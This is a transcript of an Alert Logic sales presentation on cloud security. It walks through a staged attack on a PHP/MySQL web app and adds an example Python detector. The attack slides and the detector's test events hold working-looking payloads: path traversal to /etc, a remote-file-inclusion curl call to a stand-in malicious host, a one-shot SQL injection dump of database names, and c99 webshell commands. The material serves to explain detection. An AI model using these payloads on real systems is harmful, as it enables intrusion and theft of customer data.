REALITIES OF SECURITY IN THE CLOUD
TRANSCRIPT
Mark Brooks
VP, Sales Engineering, Alert Logic
Security is a challenge.
Security Has Changed
Security in the Cloud is a Shared Responsibility
Layers (top to bottom): Apps | Virtual Machines | Networking | Infrastructure | Services
Responsibility columns: Customer | Alert Logic | Microsoft

Alert Logic:
• Security Monitoring
• Log Analysis
• Vulnerability Scanning
• Network Threat Detection

Customer (Apps):
• Security Monitoring
• Secure Coding and Best Practices
• Software and Virtual Patching
• Configuration Management
• Access Management (including multi-factor authentication)

Customer (Virtual Machines):
• Access Management
• Configuration Hardening
• Patch Management
• TLS/SSL Encryption

Customer (Networking):
• Network Security Configuration
• Web Application Firewall
• Vulnerability Scanning
• Application level attack monitoring

Microsoft (Infrastructure and Services):
• Hypervisor Management
• System Image Library
• Root Access for Customers
• Managed Patching (PaaS, not IaaS)
• Logical Network Segmentation
• Perimeter Security Services
• External DDoS, spoofing and scanning monitored
Let’s talk about security coverage.
Tame the Beast
Industry Challenge: The Good, the Bad and the Ugly
Classification and action:
• Known Good: Allow (Identify | Tune | Permit)
• Known Bad: Block (Drop | Reconfigure)
• Suspicious: HUMAN EXPERT REQUIRED
Application Stack (top to bottom): Web Apps, Server-side Apps, App Frameworks, Dev Platforms, Databases, Server OS, Hypervisor, Hardware
Classic 3-Tier Web Application: Key Target Assets
Key target assets for attack across the full stack:
1. Custom application
2. Web server implementation: Apache, IIS, NGINX
3. Application server implementation: Tomcat, JBoss, Jetty, ASP
4. Web server frameworks and languages: Struts, PHP, Java
5. Databases: MySQL, Oracle, MSSQL, ...
6. Azure services: VMs, Storage
[Diagram: classic 3-tier web application on Azure. Users reach an Internet gateway, Traffic Manager and Load Balancers; Web/App Server VM Scale Sets and DB instances sit inside a VNET spread across Availability Zone A and Availability Zone B, with Blob Storage behind them.]
An attack scenario – Recon
[Diagram: the same VNET with Internet gateway, Traffic Manager and LB; a PHP application on Linux, a MySQL instance on Linux, a Bastion Host and Storage, spread across Availability Zone A and Availability Zone B.]
1 – Performs low-frequency app-scan
2 – Tests path traversal and enumerates directories
3 – Tests remote file inclusion
Recon
• Low and slow application-level scan
• Attacker learns it is a PHP app on Linux, likely with a MySQL DB
• Suspects vulnerabilities
• Tests a potential path traversal vulnerability:
  /bWAPP/directory_traversal_2.php?directory=../../../../etc
• Path traversal is successful. Attacker enumerates server directories.
• Tests a remote file inclusion (RFI) vulnerability:
  curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site-import/admin/page.php
Attacker learnings: vulnerable PHP/MySQL app, prone to both smash'n grab attacks and more persistent attack approaches

An attack scenario – opportunistic exfiltration
[Diagram: the same environment as the Recon slide.]
4 – SQL injection data extraction attack
Entry and data exfiltration
• Attacker launches a series of SQL injection (SQLi) discovery attempts
• Gets a dump-in-one-shot attack working and receives a full table return:
  http://victim.com/report.php?id=23 and(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a)
  (the user variable @a accumulates every schema_name as the subquery iterates, so a single request returns all database names)
Attacker achievements: obtained sensitive customer data without any need for local process or system breaches on the servers

An attack scenario – persistent foothold
[Diagram: the same environment as the Recon slide.]
5 – Webshell injection
6 – Commanding through shell
Command and control (C&C)
• Attacker uploads the c99 webshell via the RFI vulnerability
• Persistent foothold for lateral movement established:
  curl -X POST -F 'act=search' -F 'grep=' -F 'fullhexdump=' -F 'base64=' -F 'nixpasswd=' -F 'pid=' -F 'c=' -F 'white=' -F 'sig=' -F 'processes_sort=' -F 'd=/var/www/' -F 'sort=' -F 'f=' -F 'ft=' http [://] mysite [dot] com/path/to/c99
Attacker achievements: obtained a foothold for further action and lateral movement
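The six-step chain above, turned into detection logic as an added example; this is not code from the original deck or from Alert Logic's product. It runs a handful of hand-written signatures plus one behavioural rule (the low-and-slow scan) over constructed HTTP events, and classifies each request with the deck's Known Good / Known Bad / Suspicious triage. The rule names, source IPs, hostnames, timestamps and request bodies are all assumptions made up for the example. The `inspect_body` switch shows why the coverage scorecard distinguishes log collection from HTTP inspection: the RFI payload lives in a POST body, which an access log never records.

```python
"""Added example (not Alert Logic's code): signature and behaviour detection
over the scenario's attack chain, run against constructed HTTP events."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Hypothetical rule names; patterns cover only the payloads shown in the scenario.
SIGNATURES = [
    ("path_traversal", re.compile(r"(\.\./){2,}|/etc/(passwd|shadow)", re.I)),
    ("remote_file_inclusion", re.compile(r"\b\w+=(https?|ftp)://", re.I)),
    ("sqli_dump_in_one_shot", re.compile(r"information_schema|@\w+:=|concat\(", re.I)),
    ("webshell_c99", re.compile(r"/c99(\.php)?\b|\bact=(search|cmd)\b", re.I)),
]


def classify(ev, inspect_body=True):
    """Return (verdict, rule). Verdicts follow the deck's triage:
    known_bad -> block, suspicious -> human expert, known_good -> allow."""
    text = unquote_plus(ev["path"])          # normalise %2e%2e%2f and friends
    if inspect_body and ev.get("body"):      # only an HTTP inspector sees the body
        text += "\n" + unquote_plus(ev["body"])
    for name, rx in SIGNATURES:
        if rx.search(text):
            return "known_bad", name
    if ev["status"] == 404:
        return "suspicious", "probe_404"
    return "known_good", None


def find_low_slow_scans(events, min_distinct=4, min_span=timedelta(hours=1)):
    """Flag sources that probe many distinct paths (404s) over a long window:
    the low-and-slow application scan that no single request reveals."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["status"] == 404:
            by_ip[ev["ip"]].append(ev)
    hits = {}
    for ip, evs in by_ip.items():
        paths = {ev["path"].split("?", 1)[0] for ev in evs}
        span = max(e["ts"] for e in evs) - min(e["ts"] for e in evs)
        if len(paths) >= min_distinct and span >= min_span:
            hits[ip] = {"distinct_paths": len(paths),
                        "span_hours": span.total_seconds() / 3600}
    return hits


def T(h, m):  # constructed timestamps, all on one day
    return datetime(2019, 5, 1, h, m)


# Constructed events mirroring steps 1-6 of the scenario (addresses are placeholders).
EVENTS = [
    {"ip": "203.0.113.9", "ts": T(1, 0), "method": "GET", "path": "/phpmyadmin/", "status": 404},
    {"ip": "203.0.113.9", "ts": T(1, 40), "method": "GET", "path": "/wp-login.php", "status": 404},
    {"ip": "203.0.113.9", "ts": T(2, 15), "method": "GET", "path": "/admin/", "status": 404},
    {"ip": "203.0.113.9", "ts": T(2, 50), "method": "GET", "path": "/bWAPP/", "status": 404},
    {"ip": "203.0.113.9", "ts": T(3, 5), "method": "GET",
     "path": "/bWAPP/directory_traversal_2.php?directory=../../../../etc", "status": 200},
    {"ip": "203.0.113.9", "ts": T(3, 20), "method": "POST",
     "path": "/wp-content/plugins/site-import/admin/page.php",
     "body": "url=http://malicious.example/test.php", "status": 200},
    {"ip": "203.0.113.9", "ts": T(3, 30), "method": "GET",
     "path": "/report.php?id=23 and(select (@a) from (select(@a:=0x00),(select (@a) from "
             "(information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a)",
     "status": 200},
    {"ip": "203.0.113.9", "ts": T(3, 45), "method": "POST", "path": "/path/to/c99",
     "body": "act=search&d=/var/www/", "status": 200},
    {"ip": "198.51.100.7", "ts": T(3, 50), "method": "GET", "path": "/index.php", "status": 200},
]


def run(events, inspect_body=True):
    """Classify every event and report low-and-slow scanners."""
    verdicts = [classify(ev, inspect_body) + (ev["path"].split("?", 1)[0],) for ev in events]
    return verdicts, find_low_slow_scans(events)


if __name__ == "__main__":
    for inspect in (False, True):
        verdicts, scans = run(EVENTS, inspect)
        print(f"inspect_body={inspect}")
        for verdict, rule, path in verdicts:
            print(f"  {verdict:11} {rule or '-':24} {path}")
        print("  low-and-slow sources:", scans)
```

With `inspect_body=False` the RFI POST is classified known_good because nothing in the path or status is wrong; with the body inspected it is caught, which is exactly the gap between the "Basic" and "Deep" threat coverage rows in the scorecard. The 404 probes are only Suspicious individually; it is the per-source aggregation across an hour and more that turns them into a scan finding.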
Alert Logic's Approach
Foundation: asset and exposure visibility
• Audit Logs
• Config & Vuln Assessment
Network, system, application infrastructure threat visibility
• Network inspection
Deep application threat visibility
• Log Collection
• HTTP Inspection
Expert SOC analysis of findings
Expert curation, R&D of content and intel
Analytics and Machine Learning
Content and Intel
Attack classes covered: application level web attacks (OWASP Top 10); attacks against vulnerable platforms and libraries; attacks against misconfigurations
Coverage needed for this scenario
How much can we see?
Attack steps scored: Recon (low slow scan, path traversal) | Entry (RFI, SQLi) | Exfil | C&C (web shell) | Overall combined coverage
Coverage layers, in the order the slides add them:
• Audit Logs and Config & Vuln Assessment (Foundation: asset and exposure visibility). Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion cannot be detected with vulnerability and config scanning.
• Network inspection (network, system, application infrastructure threat visibility). Network inspection provides visibility on attacker actions against the known vulnerabilities exploited in the attack, and on their success.
• Log Collection and HTTP Inspection (deep application threat visibility). Deep HTTP inspection of requests and responses, with learning and anomaly detection, deepens coverage for whole classes of application attacks.
Scorecard legend: No coverage | Vulnerability coverage only | Basic Threat Coverage | Deep threat coverage
Integrated Security Model
Integrated: Infrastructure | Content | Human Experts
• Data & Event Sources: Assets | Config | Logs
• Automatic Detection: Block | Alert | Log (ML Algorithms; Rules & Analytics)
• Incident Investigation: System Visual | Context | Hunt
• Security Experts: Security Researchers, Data Scientists, Software Programmers, Security Analysts
We designed security for cloud and hybrid environments
• GET STARTED IN MINUTES with modular services that grow with you
• MAINTAIN COVERAGE AT CLOUD SCALE with integration to cloud APIs and DevOps automation
• KEEP PRODUCTION FLOWING with auto-scaling support and out-of-band detection
• Comply
Single pane of glass for workload and application security across cloud, hosted & on-premises
A recognized security leader
[Chart: survey responses to "Who is your primary in-use vendor for Cloud Infrastructure Security?" and "Who are the top vendors in consideration for Cloud Infrastructure Security?", showing the Leaders: Amazon, Check Point, Chronicle Data, Cisco, Fortinet, Intel Security, Okta, Symantec, Barricade, JumpCloud, Evident.io, Palerra, Microsoft, CloudPassage, CloudCheckr, FortyCloud, ThreatStack, Alert Logic and Other.]
"Alert Logic has a head start in the cloud, and it shows."
PETER STEPHENSON, SC Magazine review
"…the depth and breadth of the offering's analytics and threat management process goes beyond anything we've seen…"
Alert Logic
Over 4,000 worldwide customers
Industries: Automotive, Healthcare, Education, Financial Services, Manufacturing, Media/Publishing, Retail/E-commerce, Energy & Chemicals, Technology & Services, Gov't / Non-profit
Thank You.